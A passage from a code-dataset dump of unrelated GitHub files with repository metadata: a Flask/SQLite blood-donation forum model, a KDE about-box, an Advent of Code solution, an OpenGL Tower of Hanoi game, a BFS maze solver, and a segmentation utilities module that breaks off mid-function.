gui_hooks.theme_did_change.append(on_theme_did_change)\n","repo_name":"Shirajuki/anki-redesign","sub_path":"utils/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":24798,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"78"} +{"seq_id":"27686808215","text":"import sqlite3\nimport os\ndef init_db():\n if not os.path.isfile('Database.sqlite'):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = '''\n PRAGMA foreign_keys = ON;\n\n CREATE TABLE donor (\n email TEXT PRIMARY KEY UNIQUE,\n name TEXT,\n age TEXT,\n gender TEXT,\n state TEXT,\n district TEXT,\n blood_group TEXT,\n contact Text,\n password TEXT\n );\n\n CREATE TABLE hospital (\n email TEXT PRIMARY KEY UNIQUE,\n name TEXT,\n license_no TEXT UNIQUE,\n district TEXT,\n state TEXT,\n contacts TEXT,\n password TEXT\n );\n\n CREATE TABLE availableBlood (\n id TEXT PRIMARY KEY,\n O_positive INTEGER DEFAULT 0,\n O_negative INTEGER DEFAULT 0,\n AB_positive INTEGER DEFAULT 0,\n AB_negative INTEGER DEFAULT 0,\n B_negative INTEGER DEFAULT 0,\n B_positive INTEGER DEFAULT 0,\n A_negative INTEGER DEFAULT 0,\n A_positive INTEGER DEFAULT 0,\n FOREIGN KEY (id) REFERENCES hospital (email)\n );\n\n CREATE TABLE camp (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n hospital_id TEXT,\n name TEXT DEFAULT 'camp',\n location TEXT DEFAULT 'hospital',\n date DATE DEFAULT (date('now', '+7 days')),\n no_of_donrs INTEGER DEFAULT 0,\n FOREIGN KEY (hospital_id) REFERENCES hospital(email)\n );\n\n CREATE TABLE campRegistered (\n donor_id TEXT,\n hospital_id TEXT,\n camp_id INTEGER,\n status TEXT,\n FOREIGN KEY (donor_id) REFERENCES donor(email),\n FOREIGN KEY (hospital_id) REFERENCES hospital(email),\n FOREIGN KEY (camp_id) REFERENCES camp(id)\n );\n\n CREATE TABLE admin (\n email TEXT PRIMARY KEY,\n password TEXT,\n name TEXT\n );\n\n '''\n\n cursor.executescript(query)\n cursor.close()\n connection.close()\n\n\ndef insert_donor(email, name, age, gender, state, district, blood_group, contact, password):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO donor (email, name, age, gender, state, district, blood_group, contact, password)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (email, name, age, gender, state, district, blood_group, contact, password))\n \n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_hospital(email, name, license_no, district, state, contacts, password):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO hospital (email, name, license_no, district, state, contacts, password)\n VALUES (?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (email, name, license_no, district, state, contacts, password))\n \n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_camp(hospital_id, name, location, date, no_of_donors):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO camp (hospital_id, name, location, date, no_of_donors)\n VALUES (?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (hospital_id, name, location, date, no_of_donors))\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_available_blood(id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO availableBlood (id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive))\n\n connection.commit()\n cursor.close()\n connection.close()\n\n\ndef insert_camp_registered(donor_id, hospital_id, camp_id, status):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO campRegistered (donor_id, hospital_id, camp_id, status)\n VALUES (?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (donor_id, hospital_id, camp_id, status))\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_admin(email, password, name):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO admin (email, password, name)\n VALUES (?, ?, ?)\n \"\"\"\n cursor.execute(query, (email, password, name))\n\n connection.commit()\n cursor.close()\n connection.close()\n\n# fetch donor from email id.\ndef get_donor_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM donor WHERE email = ?\", (email,))\n donor = cursor.fetchone()\n connection.close()\n return donor\n\ndef get_hospital_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM hospital WHERE email = ?\", (email,))\n hospital = cursor.fetchone()\n connection.close()\n return hospital\n\ndef get_admin_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM admin WHERE email = ?\", (email,))\n admin = cursor.fetchone()\n connection.close()\n return admin\n\ndef get_all_hospitals():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM hospital\")\n hospitals = cursor.fetchall()\n connection.close()\n return hospitals\n\ndef get_hospitals_count():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT count(*) FROM hospital\")\n count = cursor.fetchall()\n connection.close()\n return count\n\ndef get_all_donors():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM donor\")\n donors = cursor.fetchall()\n connection.close()\n return donors\n\ndef get_donors_count():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT count(*) FROM donor\")\n count = cursor.fetchall()\n connection.close()\n return count\n\n# Function to delete a hospital by email\ndef delete_hospital_by_email(email):\n try:\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM hospital WHERE email = ?\", (email,))\n conn.commit()\n conn.close()\n return True # Return True on successful deletion\n except sqlite3.Error as e:\n print(\"Error deleting hospital:\", e)\n return False # Return False on error\n\n# Function to delete a donor by email\ndef delete_donor_by_email(email):\n try:\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM donor WHERE email = ?\", (email,))\n conn.commit()\n conn.close()\n return True # Return True on successful deletion\n except sqlite3.Error as e:\n print(\"Error deleting donor:\", e)\n return False # Return False on error\n\nfrom flask import flash\n\ndef update_hospital_profile(email, name, contact):\n try:\n # Connect to the SQLite database\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n\n # Update the hospital's profile in the database\n cursor.execute(\"UPDATE hospital SET name = ?, contact = ? WHERE email = ?\", (name, contact, email))\n conn.commit()\n\n flash('Your profile has been updated successfully', 'success')\n\n except Exception as e:\n # Handle exceptions, log errors, or display error messages as needed\n flash('An error occurred while updating your profile. Please try again later.', 'danger')\n finally:\n # Close the database connection, regardless of success or failure\n if conn:\n conn.close()\n\n\n# Sankhanil\n\ndef search_camps_backend(state, district, donor_id = None):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n query = ''\n res = None\n if donor_id != None:\n query = '''\n SELECT c.id, h.name, c.name, c.date, c.no_of_donrs, h.contacts FROM camp c\n JOIN hospital h ON c.hospital_id = h.email\n WHERE hospital_id IN (\n SELECT email FROM hospital\n WHERE state = ? AND district = ?) AND\n c.id NOT IN (\n SELECT camp_id from campRegistered WHERE donor_id = ?\n );\n '''\n res = cursor.execute(query, (state, district, donor_id))\n else:\n query = '''\n SELECT c.id, h.name, c.name, c.date, c.no_of_donrs, h.contacts FROM camp c\n JOIN hospital h ON c.hospital_id = h.email\n WHERE hospital_id IN (\n SELECT email FROM hospital\n WHERE state = ? AND district = ?);\n '''\n res = cursor.execute(query, (state, district))\n\n data = res.fetchall()\n\n conn.close()\n\n return data\n\n\ndef register_into_camp(donor_id, hospital_id, camp_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n res = cursor.execute('INSERT INTO campRegistered VALUES(?, ?, ?, ?)', (donor_id, hospital_id, camp_id, 'Awaited'))\n\n conn.commit()\n conn.close()\n\n\ndef get_donor_past_camps(donor_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n query = '''\n SELECT c.name, c.date, h.name, h.state, h.district, r.status FROM campRegistered r\n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) < DATE('now');\n '''\n res = cursor.execute(query, (donor_id, ))\n rows = res.fetchall()\n\n conn.close()\n\n return rows\n\n\ndef view_registered_upcoming_camps(donor_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n res1 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Awaited';\n ''', (donor_id, ))\n awaited_rows = res1.fetchall()\n\n res2 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Accepted';\n ''', (donor_id, ))\n accepted_rows = res2.fetchall()\n\n res3 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Rejected';\n ''', (donor_id, ))\n rejected_rows = res3.fetchall()\n\n conn.close()\n\n return awaited_rows, accepted_rows, rejected_rows","repo_name":"Prakashgolusingh/Online-Blood-Forum","sub_path":"changes/changes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21394158398","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n\nfrom PyKDE4.kdecore import KAboutData, ki18n\n\nappName = \"pide\"\nmodName = \"pide\"\nprogramName = ki18n(\"Pide\")\nversion = \"0.0.1\"\ndescription = ki18n(\"PIDE\")\nlicense = KAboutData.License_GPL\ncopyright = ki18n(\"(c) 2009 TUBITAK/UEKAE\")\ntext = ki18n(\" \")\nhomePage = \"http://www.pardus.org.tr/eng/projects\"\nbugEmail = \"osman.mollahamid@gmail.com\"\ncatalog = appName\naboutData = KAboutData(appName, catalog, programName, version, description, license, copyright, text, homePage, bugEmail)\n\n# Author(s)\naboutData.addAuthor(ki18n(\"Osman Mollahamut\"), ki18n(\"Current Maintainer\"))\n\n\n\n","repo_name":"pisilinux/uludag","sub_path":"trunk/playground/intern/2009/pide/code/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28492855894","text":"#!/usr/bin/env python3\n\"\"\"This script solves puzzles of https://adventofcode.com/\"\"\"\n\nimport os\nimport sys\nfrom aoc_utilities import Input, test_input\n\n# 2 digit day fetched from filename\nDAY = os.path.basename(__file__)[3:5]\n\n\ndef bitsToInt(listOfBits):\n return int(\"\".join(str(x) for x in listOfBits), 2)\n\ndef solve1(data):\n \"\"\"Solves part 1.\"\"\"\n lines = [list(line) for line in data.splitlines()]\n columns = [*zip(*lines)]\n\n gammaBits = []\n epsilonBits = []\n minimumToBeMostCommon = int(len(lines) / 2)\n\n for col in columns:\n if col.count(\"1\") > minimumToBeMostCommon:\n gammaBits.append(\"1\")\n epsilonBits.append(\"0\")\n else:\n gammaBits.append(\"0\")\n epsilonBits.append(\"1\")\n\n return bitsToInt(gammaBits) * bitsToInt(epsilonBits)\n\n\ndef solve2(data):\n \"\"\"Solves part2.\"\"\"\n lines = [list(line) for line in data.splitlines()]\n\n candidatesForO2gen = lines\n candidatesForCO2scrub = lines\n\n for index in range(len(lines[0])):\n columns = [*zip(*candidatesForO2gen)]\n howMany1s = columns[index].count(\"1\")\n howMany0s = len(columns[0]) - howMany1s\n\n if howMany1s > howMany0s:\n print(f\"most common bit for column n°{index} is 1\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index]==\"1\"]\n elif howMany1s == howMany0s:\n print(f\"for column n°{index}, there are as many 1s as 0s, keeping 1s\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index] == \"1\"]\n else:\n print(f\"most common bit for column n°{index} is 0\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index]==\"0\"]\n if len(candidatesForO2gen) == 1:\n print(f\"most common bit for column n°{index} is 0\")\n break\n\n for index in range(len(lines[0])):\n columns = [*zip(*candidatesForCO2scrub)]\n howMany1s = columns[index].count(\"1\")\n howMany0s = len(columns[0]) - howMany1s\n\n if howMany0s > howMany1s:\n print(f\"least common bit for column n°{index} is 1\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index]==\"1\"]\n elif howMany1s == howMany0s:\n print(f\"for column n°{index}, there are as many 1s as 0s, keeping 0s\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index] == \"0\"]\n else:\n print(f\"least common bit for column n°{index} is 0\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index]==\"0\"]\n if len(candidatesForCO2scrub) == 1:\n break\n\n\n return bitsToInt(candidatesForO2gen[0]) * bitsToInt(candidatesForCO2scrub[0])\n\n\"\"\"\nUse script args to execute the right function.\n\"\"\"\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1] == '1':\n res = solve1((Input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '1t':\n res = solve1((test_input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '2':\n res = solve2((Input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '2t':\n res = solve2((test_input(DAY).read()))\n print(res)\n","repo_name":"edelans/Advent-of-Code","sub_path":"aoc2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29051972519","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport OpenGL.GLUT as glut\n\n#variaveis globais necessarias para o funcionamento do programa\nwin = False\nwin_message_str = 'Você venceu!'\nwin_message_rotation = 0.0\nwindow_width = 640\nwindow_height = 480\ntowers_number = 3\ntowers_width = 25\ntowers_height = 75\ntowers = {}\ndiscs = {}\n\n\n#seta valores default para as variaveis globais envolvendo torres\ndef set_towers_default_values():\n global towers, towers_number, towers_width, towers_height\n towers_number = 3\n towers_width = 25\n towers_height = 75\n towers = {\n 't1': {\n 'pos': -70,\n 'discs': [1, 2, 3] \n },\n 't2': {\n 'pos': 0,\n 'discs': [] \n },\n 't3': {\n 'pos': 70,\n 'discs': [] \n },\n }\n\n\n#seta valores default para as variaveis globais envolvendo os discos\ndef set_discs_default_values():\n global discs\n discs = {\n 'disc1': {\n 'number': 1,\n 'x': 4,\n 'y': 8,\n 'min_limit_x': -74,\n 'max_limit_x': -66,\n 'min_limit_y': 20,\n 'max_limit_y': 30,\n 'pos_x': -70,\n 'pos_y': 16,\n 'tower': 1\n },\n 'disc2': {\n 'number': 2,\n 'x': 7,\n 'y': 8,\n 'min_limit_x': -77,\n 'max_limit_x': -63,\n 'min_limit_y': 10,\n 'max_limit_y': 20,\n 'pos_x': -70,\n 'pos_y': 8,\n 'tower': 1\n },\n 'disc3': {\n 'number': 3,\n 'x': 10,\n 'y': 8,\n 'min_limit_x': -80,\n 'max_limit_x': -60,\n 'min_limit_y': 0,\n 'max_limit_y': 10,\n 'pos_x': -70,\n 'pos_y': 0,\n 'tower': 1\n },\n }\n\n\n#cria uma torre\ndef tower():\n glBegin(GL_LINES)\n glVertex2f(-towers_width, 0)\n glVertex2f(towers_width, 0)\n glEnd()\n glBegin(GL_LINES)\n glVertex2f(0, towers_height)\n glVertex2f(0, 0)\n glEnd()\n\n\n#faz a função de escala da torre\ndef tower_scale():\n if towers_number == 5:\n glScalef(0.5, 0.5, 1.0)\n\n\n#desenha todas as torres\ndef draw_all_towers():\n glColor3f(0.0, 0.0, 0.0)\n glLineWidth(6)\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t1']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t2']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t3']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n if towers_number == 5:\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t4']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t5']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n\n#desenha um disco\ndef draw_disc(disc_number):\n glBegin(GL_POLYGON)\n glVertex2f(discs['disc'+str(disc_number)]['x']*-1, discs['disc'+str(disc_number)]['y'])\n glVertex2f(discs['disc'+str(disc_number)]['x'], discs['disc'+str(disc_number)]['y'])\n glVertex2f(discs['disc'+str(disc_number)]['x'], 0)\n glVertex2f(discs['disc'+str(disc_number)]['x']*-1, 0)\n glEnd()\n\n\n#posiciona o disco\ndef disc_positioning(x, y):\n glTranslatef(x, 0, 0)\n glTranslatef(0, y, 0)\n\n\n#desenha todos os discos\ndef draw_all_discs():\n glColor3f(1.0, 0.0, 0.0)\n glPushMatrix()\n disc_positioning(discs['disc1']['pos_x'], discs['disc1']['pos_y'])\n draw_disc(1)\n glPopMatrix()\n\n\n glColor3f(0.0, 1.0, 0.0)\n glPushMatrix()\n disc_positioning(discs['disc2']['pos_x'], discs['disc2']['pos_y'])\n draw_disc(2)\n glPopMatrix()\n\n glColor3f(0.0, 0.0, 1.0)\n glPushMatrix()\n disc_positioning(discs['disc3']['pos_x'], discs['disc3']['pos_y'])\n draw_disc(3)\n glPopMatrix()\n\n if towers_number == 5:\n glColor3f(0.5, 0.5, 1.0)\n glPushMatrix()\n disc_positioning(discs['disc4']['pos_x'], discs['disc4']['pos_y'])\n draw_disc(4)\n glPopMatrix()\n\n glColor3f(0.5, 0.5, 0.5)\n glPushMatrix()\n disc_positioning(discs['disc5']['pos_x'], discs['disc5']['pos_y'])\n draw_disc(5)\n glPopMatrix()\n\n\n#desenha o texto de ajuda\ndef help_text():\n text = \"Aperte 't' para aumentar o número de torres e 'r' para reiniciar o jogo\"\n glColor3f(0, 0, 0)\n glRasterPos2f(-85, -90)\n for i in range(len(text)):\n glut.glutBitmapCharacter(GLUT_BITMAP_HELVETICA_18, ord(text[i]))\n\n\n#desenha o texto de vitória\ndef win_message():\n global win_message_rotation\n glColor3f(0, 0.8, 0)\n glPushMatrix()\n glRotatef (win_message_rotation, 0.0, 0.0, 1.0)\n glRasterPos2f(-20, -20)\n for i in range(len(win_message_str)):\n glut.glutBitmapCharacter(GLUT_BITMAP_TIMES_ROMAN_24, ord(win_message_str[i]))\n glPopMatrix()\n\n\n#desenha a base do jogo\ndef draw():\n glClear(GL_COLOR_BUFFER_BIT)\n\n draw_all_towers()\n draw_all_discs()\n\n if win:\n win_message()\n\n help_text()\n\n glutSwapBuffers()\n\n\n#realiza a conversão do SRD para o SRU\ndef srd_to_sru(x, y):\n x = (2 * x) / (window_width / 100) - 100\n y = (2 * -y) / (window_height / 100) + 100\n return x, y\n\n\n#valida se o clique esta na area do disco\ndef is_in_disc_area(disc, x, y):\n return x >= disc['min_limit_x'] and x <= disc['max_limit_x'] and y >= disc['min_limit_y'] and y <= disc['max_limit_y']\n\n\n#pega uma torre\ndef get_tower(tower_number):\n return towers[f't{tower_number}']\n\n\n#valida se o movimento é valido\ndef can_make_the_move(actual_tower, next_tower, disc):\n if actual_tower['discs'][0] != disc['number']:\n return False\n if len(next_tower['discs']) != 0 and next_tower['discs'][0] < disc['number']:\n return False\n return True\n\n\n#seta os valores pra nova posicao do disco após o clique\ndef set_disc_position(disc, tower):\n if towers_number == 5:\n disc_pos_x = tower['pos'] / 2\n else:\n disc_pos_x = tower['pos']\n disc_pos_y = len(tower['discs']) * 8\n disc['pos_x'] = disc_pos_x\n disc['pos_y'] = disc_pos_y\n disc['min_limit_x'] = disc_pos_x - disc['x']\n disc['max_limit_x'] = disc_pos_x + disc['x']\n disc['min_limit_y'] = disc_pos_y\n disc['max_limit_y'] = disc_pos_y + 8\n\n\n#seta os valores necessarios do disco após o clique\ndef set_tower_discs(disc, origin_tower, destiny_tower, next_tower_number):\n disc['tower'] = next_tower_number\n origin_tower['discs'].pop(0)\n destiny_tower['discs'].insert(0, disc['number'])\n \n\n#função do mouse\ndef on_mouse_click(button, state, x, y):\n global win, win_message_rotation\n\n if state == 1:\n return\n\n if win:\n win_message_rotation += 20.0\n glutPostRedisplay()\n return\n\n x, y = srd_to_sru(x, y)\n\n for disc in discs.values():\n if is_in_disc_area(disc, x, y):\n actual_tower = get_tower(disc['tower'])\n \n next_tower_number = disc['tower'] + 1\n if next_tower_number > towers_number:\n next_tower_number = 1\n next_tower = get_tower(next_tower_number)\n\n if not can_make_the_move(actual_tower, next_tower, disc):\n return\n \n set_disc_position(disc, next_tower)\n set_tower_discs(disc, actual_tower, next_tower, next_tower_number)\n\n if towers_number == 3:\n if len(towers['t3']['discs']) == 3:\n win = True\n else:\n if len(towers['t3']['discs']) == 5:\n win = True\n\n glutPostRedisplay()\n\n\n#atualiza as variaveis globais para jogar com 5 torres\ndef set_five_towers_global_values():\n global towers_number, towers_width, towers_height, win\n win = False\n towers_number = 5\n towers_width = 30\n towers_height = 90\n\n\n#ajusta as posições das torres para 5 torres\ndef adjust_towers_position(disc, tower_pos, x, min_limit_y, max_limit_y):\n discs_position = tower_pos / 2\n\n disc['x'] = x\n disc['min_limit_x'] = discs_position - x\n disc['max_limit_x'] = discs_position + x\n disc['min_limit_y'] = min_limit_y\n disc['max_limit_y'] = max_limit_y\n disc['pos_x'] = discs_position\n disc['pos_y'] = min_limit_y\n\n\n#adiciona os novos discos quando é alterado pra 5 torres\ndef add_new_discs(tower_pos):\n discs_position = tower_pos / 2\n\n discs['disc4'] = {\n 'number': 4,\n 'x': 10,\n 'y': 8,\n 'min_limit_x': -83,\n 'max_limit_x': -57,\n 'min_limit_y': 8,\n 'max_limit_y': 16,\n 'pos_x': discs_position,\n 'pos_y': 8,\n 'tower': 1\n }\n discs['disc5'] = {\n 'number': 5,\n 'x': 12,\n 'y': 8,\n 'min_limit_x': -87,\n 'max_limit_x': -53,\n 'min_limit_y': 0,\n 'max_limit_y': 8,\n 'pos_x': discs_position,\n 'pos_y': 0,\n 'tower': 1\n }\n\n\n#adiciona as novas torres e discos\ndef add_towers():\n set_towers_default_values()\n set_discs_default_values()\n set_five_towers_global_values()\n\n towers['t1']['discs'] = [1, 2, 3, 4, 5]\n\n towers['t1']['pos'] = -150\n towers['t2']['pos'] = -75\n towers['t3']['pos'] = 0\n\n towers['t4'] = {\n 'pos': 75,\n 'discs': [] \n }\n towers['t5'] = {\n 'pos': 150,\n 'discs': [] \n }\n\n adjust_towers_position(discs['disc1'], towers['t1']['pos'], 4, 32, 40)\n adjust_towers_position(discs['disc2'], towers['t1']['pos'], 6, 24, 32)\n adjust_towers_position(discs['disc3'], towers['t1']['pos'], 8, 16, 24)\n\n add_new_discs(towers['t1']['pos'])\n\n\n#reinicia o jogo\ndef reset_game():\n global win\n win = False\n set_towers_default_values()\n set_discs_default_values()\n \n\n#função do teclado\ndef keyboard_func(key, x, y):\n if key == b't':\n add_towers()\n elif key == b'r':\n reset_game()\n else:\n return\n draw()\n\n\n#inicialização\ndef init():\n glClearColor(0.8, 0.8, 0.8, 0.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluOrtho2D(-100, 100, -100, 100)\n\n\n#funcao main\ndef main():\n set_towers_default_values()\n set_discs_default_values()\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(window_width, window_height)\n glutCreateWindow('Torre de Hanoi')\n glutMouseFunc(on_mouse_click)\n glutKeyboardFunc(keyboard_func)\n glutDisplayFunc(draw)\n init()\n glutMainLoop()\n\n\n#chamada da função main\nmain()\n","repo_name":"moretto1/computaca-grafica","sub_path":"g1/bruno_morettoo_luiz_calazans-cg-t1.py","file_name":"bruno_morettoo_luiz_calazans-cg-t1.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21671233912","text":"#DFS는 최단거리를 찾기 위해 완전 탐색을 하고 그중에서 최솟값을 구하게 되는데, 경로가 무수하게 많을 수 있어 매우 오랜 시간이 소요된다.\n# 실제로 DFS로 풀이 후 제출하면 시간 초과가 난다.\n#반면 BFS는 최단거리를 보장한다. 이 미로탐색 문제는 모든 경우의 수를 구하지 않고 최단거리만 구하면 되게 때문에 BFS로 풀이한다.\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN,M= map(int ,input().rstrip().split())\nMap = [list(map(int ,input().rstrip())) for _ in range(N)]\n\ndr=[0,0,-1,1]\ndc=[1,-1,0,0]\n\n\nq=deque()\nsr,sc=0,0\nq.append([sr,sc])\nwhile q:\n r,c=q.popleft()\n for i in range(4):\n cc= c+dc[i]\n rc= r+dr[i]\n if 0<=cc BGR\n img = img.astype(np.float64)\n mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])\n img -= mean_bgr\n img = img.transpose(2, 0, 1) # HxWxC --> CxHxW\n return img\n\n\ndef split_trn_val(num_train, valid_size=0.2, shuffle=False):\n indices = list(range(num_train))\n if shuffle:\n np.random.shuffle(indices)\n split = int(np.floor(valid_size * num_train))\n trn_indices, val_indices = indices[split:], indices[:split]\n return trn_indices, val_indices\n\n\ndef cross_entropy2d(score, target, weight=None, size_average=True):\n log_p = F.log_softmax(score)\n\n # Flatten the score tensor\n n, c, h, w = score.size()\n log_p = log_p.transpose(1, 2).transpose(2, 3).contiguous().view(-1, c)\n # Remove guesses corresponding to \"unknown\" labels\n # (labels that are less than zero)\n log_p = log_p[target.view(n * h * w, 1).repeat(1, c) >= 0]\n log_p = log_p.view(-1, c)\n\n # Remove \"unknown\" labels (labels that are less than zero)\n # Also, flatten the target tensor\n # TODO: Replace this entire function with nn.functional.cross_entropy\n # with ignore_index set to -1.\n mask = target >= 0\n target = target[mask]\n\n loss = F.nll_loss(log_p, target, weight=weight, size_average=False)\n\n if size_average:\n loss /= mask.data.sum()\n return loss\n\n\ndef scoretensor2mask(scoretensor):\n \"\"\"\n - scoretensor (3D torch tensor) (CxHxW): Each channel contains the scores\n for the corresponding category in the image.\n Returns a numpy array.\n \"\"\"\n _, labels = scoretensor.max(0) # Get labels w/ highest scores\n labels_np = labels.numpy().astype(np.uint8)\n mask = labels_np * 255\n return mask\n\n\ndef detransform_portrait(img, mean=\"voc\"):\n \"\"\"\n - img (torch tensor)\n Returns a numpy array.\n \"\"\"\n if mean == \"voc\":\n mean_bgr = np.array([104.00698793, 116.66876762, 122.67891434])\n else:\n raise ValueError(\"unknown mean\")\n # img = img.numpy().astype(np.float64)\n img = img.transpose((1, 2, 0)) # CxHxW --> HxWxC\n # img *= 255\n img += mean_bgr\n img = img[:, :, ::-1] # BGR -> RGB\n img = img.astype(np.uint8)\n return img\n\n\ndef detransform_mask(mask):\n # mask = mask.numpy()\n mask = mask.astype(np.uint8)\n mask *= 255\n return mask\n\n\ndef mask_image(img, mask, opacity=1.00, bg=False):\n \"\"\"\n - img (PIL)\n - mask (PIL)\n - opacity (float) (default: 1.00)\n Returns a PIL image.\n \"\"\"\n blank = Image.new('RGB', img.size, color=0)\n if bg:\n masked_image = Image.composite(blank, img, mask)\n else:\n masked_image = Image.composite(img, blank, mask)\n if opacity < 1:\n masked_image = Image.blend(img, masked_image, opacity)\n return masked_image\n\n\ndef show_portrait_pred_mask(portrait, preds, mask, start_iteration,\n evaluation_interval,\n opacity=None, bg=False, fig=None):\n \"\"\"\n Args:\n - portrait (torch tensor)\n - preds (list of np.ndarray): list of mask predictions\n - mask (torch tensor)\n A visualization function.\n Returns nothing.\n \"\"\"\n # Gather images\n images = []\n titles = []\n cmaps = []\n\n # ### Prepare portrait\n portrait_pil = Image.fromarray(portrait)\n images.append(portrait)\n titles.append(\"input\")\n cmaps.append(None)\n\n # ### Prepare predictions\n for i, pred in enumerate(preds):\n pred_pil = Image.fromarray(pred)\n if opacity:\n pred_pil = mask_image(portrait_pil, pred_pil, opacity, bg)\n images.append(pred_pil)\n titles.append(\"iter. %d\" % (start_iteration + i * evaluation_interval))\n cmaps.append(\"gray\")\n\n # ### Prepare target mask\n if opacity:\n mask_pil = Image.fromarray(mask)\n mask = mask_image(portrait_pil, mask_pil, opacity, bg)\n images.append(mask)\n titles.append(\"target\")\n cmaps.append(\"gray\")\n\n # Show images\n cols = 5\n rows = int(np.ceil(len(images) / cols))\n w = 12\n h = rows * (w / cols + 1)\n figsize 